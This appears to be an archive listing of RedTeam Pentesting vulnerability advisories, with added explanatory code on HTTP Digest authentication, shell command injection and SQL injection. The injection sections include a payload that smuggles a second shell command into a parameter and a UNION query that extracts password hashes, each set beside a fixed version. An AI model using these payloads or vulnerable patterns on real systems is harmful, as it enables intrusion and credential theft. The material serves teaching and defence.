Advisory: Directory Traversal in Cisco Expressway Gateway RedTeam Pentesting discovered a directory traversal vulnerability in Cisco Expressway which enables access to administrative web interfaces. Details === Product: Cisco Expressway Gateway Affected Versions: 11.5.1, possibly others

[RT-SA-2019-012] Information Disclosure in REDDOXX Appliance

2019-07-01 Thread RedTeam Pentesting GmbH
Advisory: Information Disclosure in REDDOXX Appliance RedTeam Pentesting discovered an Information Disclosure vulnerability in the REDDOXX appliance software, which allows unauthenticated attackers to gain information about the internal network the appliance is part of. Details === Product

[RT-SA-2019-016] IceWarp: Cross-Site Scripting in Notes

2020-01-02 Thread RedTeam Pentesting GmbH
Advisory: IceWarp: Cross-Site Scripting in Notes During a penetration test, RedTeam Pentesting discovered that the IceWarp WebMail Server is prone to cross-site scripting attacks in notes for objects. If attackers with access to the IceWarp system provide a manipulated object that is displayed by

[RT-SA-2019-015] IceWarp: Cross-Site Scripting in Notes for Contacts

2020-01-02 Thread RedTeam Pentesting GmbH
Advisory: IceWarp: Cross-Site Scripting in Notes for Contacts During a penetration test, RedTeam Pentesting discovered that the IceWarp WebMail Server is prone to user-assisted cross-site scripting attacks in its contact module. If IceWarp users import a manipulated vcard, for example from an

New Paper: MitM Attacks against the chipTAN comfort Online Banking System

2009-11-24 Thread RedTeam Pentesting GmbH
using the iTAN system at risk. RedTeam Pentesting examined chipTAN comfort and showed that even when using this system, man-in-the-middle attacks can compromise online banking security. The full paper is available in German and English at http://www.redteam-pentesting.de/publications/MitM

TLS Renegotiation Vulnerability: Proof of Concept Code (Python)

2009-12-21 Thread RedTeam Pentesting GmbH
layer protocol used over TLS. RedTeam Pentesting used the Python module "TLS Lite" to develop proof of concept code that exploits this vulnerability. It is published at http://www.redteam-pentesting.de/publications/tls-renegotiation to raise awareness for the vulnerability and its

[RT-SA-2010-001] Geo++(R) GNCASTER: Insecure handling of long URLs

2010-01-27 Thread RedTeam Pentesting GmbH
Advisory: Geo++(R) GNCASTER: Insecure handling of long URLs During a penetration test, RedTeam Pentesting discovered that the GNCASTER software does not handle long URLs correctly. An attacker can use this to crash the server software or potentially execute code on the server. Details

[RT-SA-2010-002] Geo++(R) GNCASTER: Insecure handling of NMEA-data

2010-01-27 Thread RedTeam Pentesting GmbH
Advisory: Geo++(R) GNCASTER: Insecure handling of NMEA-data During a penetration test, RedTeam Pentesting discovered that the GNCaster software does not handle NMEA-data correctly. An attacker that has valid login credentials can use this to crash the server software or potentially execute code

[RT-SA-2010-003] Geo++(R) GNCASTER: Faulty implementation of HTTP Digest Authentication

2010-01-27 Thread RedTeam Pentesting GmbH
Advisory: Geo++(R) GNCASTER: Faulty implementation of HTTP Digest Authentication During a penetration test, RedTeam Pentesting discovered that the GNCaster software has multiple bugs in its implementation of HTTP Digest Authentication. Details === Product: Geo++(R) GNCASTER
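The entry above does not say which parts of the Digest implementation were wrong, so the following added example does not reproduce GNCASTER's code or its bugs. It is a reference implementation of HTTP Digest (RFC 2617, MD5, qop=auth): the client-side response computation, checked against the worked example in the RFC itself, and a server-side verifier that does the checks a correct implementation must perform (nonce issued by the server, nonce-count strictly increasing, URI in the header matching the request line, constant-time comparison). The `DigestVerifier` class and `demo()` function are this example's own, not part of any product.

```python
"""Added example (not GNCASTER code): reference computation and server-side
check for HTTP Digest Authentication, RFC 2617, algorithm MD5, qop=auth.
Test vector: the worked example from RFC 2617 section 3.5.
"""
import hashlib
import hmac


def _md5(s: str) -> str:
    return hashlib.md5(s.encode("utf-8")).hexdigest()


def digest_response(username, realm, password, method, uri, nonce,
                    nc, cnonce, qop="auth"):
    """Client side: response = H(HA1 ':' nonce ':' nc ':' cnonce ':' qop ':' HA2)
    with HA1 = H(user:realm:password) and HA2 = H(method:uri)."""
    ha1 = _md5(f"{username}:{realm}:{password}")
    ha2 = _md5(f"{method}:{uri}")
    return _md5(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")


class DigestVerifier:
    """Server side. Stores HA1 per user (never the cleartext password),
    remembers which nonces it issued and the highest nc seen for each."""

    def __init__(self, realm):
        self.realm = realm
        self.ha1_by_user = {}
        self.issued_nonces = {}  # nonce -> highest nonce-count accepted

    def add_user(self, username, password):
        self.ha1_by_user[username] = _md5(f"{username}:{self.realm}:{password}")

    def issue_nonce(self, nonce):
        # A real server generates the nonce; here it is passed in so the
        # RFC test vector can be replayed.
        self.issued_nonces[nonce] = 0

    def verify(self, method, request_uri, auth):
        """auth: parsed fields of the Authorization header as a dict."""
        nonce = auth.get("nonce")
        if nonce not in self.issued_nonces:
            return False  # never issued, or expired
        # The uri in the header must equal the request line, otherwise a
        # captured response for one resource could be replayed for another.
        if auth.get("uri") != request_uri:
            return False
        try:
            nc = int(auth.get("nc", ""), 16)
        except ValueError:
            return False
        if nc <= self.issued_nonces[nonce]:
            return False  # replayed nonce-count
        ha1 = self.ha1_by_user.get(auth.get("username"))
        if ha1 is None:
            return False
        ha2 = _md5(f"{method}:{request_uri}")
        expected = _md5(f"{ha1}:{nonce}:{auth['nc']}:{auth.get('cnonce', '')}:"
                        f"{auth.get('qop', 'auth')}:{ha2}")
        if not hmac.compare_digest(expected, auth.get("response", "")):
            return False
        self.issued_nonces[nonce] = nc
        return True


# RFC 2617 section 3.5 example header, as a parsed dict.
RFC_EXAMPLE = dict(username="Mufasa", realm="testrealm@host.com",
                   nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093",
                   uri="/dir/index.html", qop="auth", nc="00000001",
                   cnonce="0a4f113b",
                   response="6629fae49393a05397450978507c4ef1")


def demo():
    """Runs the RFC header through the verifier three times: genuine,
    replayed unchanged, and replayed against a different URI.
    Returns (True, False, False)."""
    v = DigestVerifier("testrealm@host.com")
    v.add_user("Mufasa", "Circle Of Life")
    v.issue_nonce(RFC_EXAMPLE["nonce"])
    genuine = v.verify("GET", "/dir/index.html", RFC_EXAMPLE)
    replay = v.verify("GET", "/dir/index.html", RFC_EXAMPLE)
    other_uri = v.verify("GET", "/dir/other.html",
                         dict(RFC_EXAMPLE, uri="/dir/other.html", nc="00000002"))
    return genuine, replay, other_uri


if __name__ == "__main__":
    print(demo())
```

When testing a server's Digest implementation, the three `demo()` cases are a useful minimum: a valid response must be accepted, the identical header must be rejected on the second try, and a response for one URI must not open another.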

Fujitsu-Siemens ServerView Remote Command Execution

2007-07-04 Thread RedTeam Pentesting GmbH
Advisory: Fujitsu-Siemens ServerView Remote Command Execution RedTeam Pentesting discovered a remote command execution in the Fujitsu-Siemens ServerView during a penetration test. The DBAsciiAccess CGI script is vulnerable to a remote command execution because of a parameter which is not

Fujitsu-Siemens PRIMERGY BX300 Switch Blade Information Disclosure

2007-07-04 Thread RedTeam Pentesting GmbH
Advisory: Fujitsu-Siemens PRIMERGY BX300 Switch Blade Information Disclosure RedTeam Pentesting discovered an information disclosure in the Fujitsu-Siemens BX300 Switch Blade during a penetration test. By accessing URLs of the web interface directly and aborting the authentication

ActiveWeb Contentserver CMS Clientside Filtering of Page Editor Content

2007-07-13 Thread RedTeam Pentesting GmbH
Advisory: ActiveWeb Contentserver CMS Clientside Filtering of Page Editor Content RedTeam Pentesting discovered a design vulnerability in the page editor of the activeWeb contentserver CMS during a penetration test. Filtering of user content, e.g. to prevent the usage of Javascript code

ActiveWeb Contentserver CMS Editor Permission Settings Problem

2007-07-13 Thread RedTeam Pentesting GmbH
Advisory: ActiveWeb Contentserver CMS Editor Permission Settings Problem RedTeam Pentesting discovered a problem with the permission settings in the management interface of the activeWeb contentserver CMS during a penetration test. The ability of an editor to create and edit documents can be

ActiveWeb Contentserver CMS SQL Injection Management Interface

2007-07-13 Thread RedTeam Pentesting GmbH
Advisory: ActiveWeb Contentserver CMS SQL Injection Management Interface RedTeam Pentesting discovered an SQL Injection in the picture_real_edit.asp script of the activeWeb contentserver CMS during a penetration test. An editor with the permission to edit pictures can exploit this by injecting

ActiveWeb Contentserver CMS Multiple Cross Site Scriptings

2007-07-13 Thread RedTeam Pentesting GmbH
Advisory: ActiveWeb Contentserver CMS Multiple Cross Site Scriptings RedTeam Pentesting discovered three Cross Site Scripting vulnerabilities in the activeWeb contentserver CMS during a penetration test. One of the Cross Site Scriptings is persistent. Details === Product: activeWeb

Alcatel-Lucent OmniPCX Remote Command Execution

2007-09-17 Thread RedTeam Pentesting GmbH
Advisory: Alcatel-Lucent OmniPCX Remote Command Execution RedTeam Pentesting discovered a remote command execution in the Alcatel-Lucent OmniPCX during a penetration test. The masterCGI script of the OmniPCX integrated communication solution web interface is vulnerable to a remote command
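The ServerView and OmniPCX entries above both describe a CGI script that hands an unsanitized request parameter to a command. Neither snippet names the parameter or the command, so the following added example is not code from either product: it shows the class of bug with a constructed `host` parameter passed to `echo`, first through a shell command string, then as an argument vector, and finally behind an allow-list check. The parameter name, the command and the payload are assumptions for illustration.

```python
"""Added example (not ServerView or OmniPCX code): shell command injection
through an unsanitized CGI parameter, and two ways to close it.

Assumptions: a hypothetical 'host' parameter is passed to 'echo' so the
example runs anywhere with /bin/sh; a real script would call something
like ping or a vendor tool, with the same consequences.
"""
import re
import subprocess

# Constructed payload: a shell metacharacter followed by a second command.
PAYLOAD = "127.0.0.1; echo INJECTED"

_HOST_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9.-]{0,252}[A-Za-z0-9])?$")


def run_vulnerable(host):
    """Vulnerable: the parameter is spliced into a command line that is
    handed to /bin/sh, so ';', '|', '`' and '$()' are interpreted."""
    cmd = "echo " + host
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def run_safe(host):
    """No shell involved: the parameter is a single argv element and
    reaches the program as data, metacharacters included."""
    return subprocess.run(["echo", host], capture_output=True, text=True).stdout


def is_valid_host(value):
    """Allow-list check for a hostname or dotted IPv4 address."""
    return _HOST_RE.match(value) is not None


def run_hardened(host):
    """Validate first, then call without a shell. Returns None on bad input
    so the caller can answer with an error instead of running anything."""
    if not is_valid_host(host):
        return None
    return run_safe(host)


if __name__ == "__main__":
    print("vulnerable:", repr(run_vulnerable(PAYLOAD)))
    print("argv list: ", repr(run_safe(PAYLOAD)))
    print("hardened:  ", repr(run_hardened(PAYLOAD)))
```

The argument-vector form alone already removes the injection; the allow-list is the second layer for cases where the called program itself interprets its arguments (option injection, for instance).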

Advisory: SQL-Injections in Mapbender

2008-03-11 Thread RedTeam Pentesting GmbH
Advisory: SQL-Injections in Mapbender During a penetration test RedTeam Pentesting discovered multiple SQL-Injections in Mapbender. A remote attacker is able to execute arbitrary SQL commands and therefore can get e.g. valid usernames and password hashes of the Mapbender users. Details
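The snippet above says a remote attacker can run arbitrary SQL and read usernames and password hashes. The following added example is not Mapbender code and does not use its schema: on an in-memory SQLite database with two constructed tables, a public layer lookup built by string formatting is turned into a UNION query that returns the user table's hashes, and the same lookup with a bound parameter returns nothing for the same input. The table and column names are assumptions for illustration.

```python
"""Added example (not Mapbender code): SQL injection in a string-built
query, used to pull usernames and password hashes out of a table the
query was never meant to touch, beside the parameterized version.

Assumptions: constructed tables mb_layer(id, title) and mb_user(id, name,
pw_hash); MD5 hashes only because they are short, not as a recommendation.
"""
import hashlib
import sqlite3


def setup_db():
    """In-memory database with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE mb_layer (id INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("CREATE TABLE mb_user (id INTEGER PRIMARY KEY, name TEXT, pw_hash TEXT)")
    conn.executemany("INSERT INTO mb_layer VALUES (?, ?)", [(1, "Roads"), (2, "Rivers")])
    for i, (name, pw) in enumerate([("admin", "s3cret"), ("guest", "guest")], 1):
        conn.execute("INSERT INTO mb_user VALUES (?, ?, ?)",
                     (i, name, hashlib.md5(pw.encode()).hexdigest()))
    conn.commit()
    return conn


def lookup_layer_vulnerable(conn, title):
    """Vulnerable: the request parameter is formatted into the SQL text."""
    sql = "SELECT id, title FROM mb_layer WHERE title = '%s'" % title
    return conn.execute(sql).fetchall()


def lookup_layer_safe(conn, title):
    """Hardened: same query, the parameter is bound and can only be a value."""
    return conn.execute("SELECT id, title FROM mb_layer WHERE title = ?",
                        (title,)).fetchall()


# Constructed payload: closes the string literal, appends a UNION with the
# same column count, and lets the template's trailing quote close '1'='1'.
UNION_PAYLOAD = "x' UNION SELECT name, pw_hash FROM mb_user WHERE '1'='1"


def leaked_hashes(conn):
    """What the attacker sees: {name: pw_hash} rows from mb_user that came
    back through the layer lookup."""
    return {name: pw_hash for name, pw_hash in lookup_layer_vulnerable(conn, UNION_PAYLOAD)
            if isinstance(name, str) and len(str(pw_hash)) == 32}


if __name__ == "__main__":
    db = setup_db()
    print("vulnerable:", leaked_hashes(db))
    print("safe:      ", lookup_layer_safe(db, UNION_PAYLOAD))
```

The UNION form is the one relevant to the advisory's consequence: the query being attacked does not have to touch the user table for the user table to leak, as long as the attacker can match the column count.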

[RT-SA-2009-004] IceWarp WebMail Server: Client-Side Specification of "Forgot Password" eMail Content

2009-05-05 Thread RedTeam Pentesting GmbH
Advisory: IceWarp WebMail Server: Client-Side Specification of "Forgot Password" eMail Content During a penetration test, RedTeam Pentesting discovered that the emails sent by the IceWarp WebMail Server when using the "Forgot Password" function are generate

[RT-SA-2009-002] IceWarp WebMail Server: User-assisted Cross Site Scripting in RSS Feed Reader

2009-05-05 Thread RedTeam Pentesting GmbH
Advisory: IceWarp WebMail Server: User-assisted Cross Site Scripting in RSS Feed Reader During a penetration test, RedTeam Pentesting discovered that the IceWarp WebMail Server is prone to user-assisted Cross Site Scripting attacks in its RSS feed reader. If attackers control or

[RT-SA-2009-003] IceWarp WebMail Server: SQL Injection in Groupware Component

2009-05-05 Thread RedTeam Pentesting GmbH
Advisory: IceWarp WebMail Server: SQL Injection in Groupware Component During a penetration test RedTeam Pentesting discovered multiple SQL-Injections in the IceWarp WebMail Server. Attackers that are in control of a user account for the web-based email and groupware components are able to

[RT-SA-2009-001] IceWarp WebMail Server: Cross Site Scripting in Email View

2009-05-05 Thread RedTeam Pentesting GmbH
Advisory: IceWarp WebMail Server: Cross Site Scripting in Email View During a penetration test, RedTeam Pentesting discovered that the IceWarp WebMail Server is prone to Cross Site Scripting attacks in its email view. This enables attackers to send emails with embedded JavaScript code, for

[RT-SA-2009-005] Papoo CMS: Authenticated Arbitrary Code Execution

2009-08-10 Thread RedTeam Pentesting GmbH
d 2009-06-05 Vendor notified 2009-06-30 Vendor releases patch[0] References == [0] http://www.papoo.de/cms-news-und-infos/security/papoo-sicherheitsmeldung-07-2009.html RedTeam Pentesting GmbH === RedTeam Pentesting is offering individual penetration tests, short pent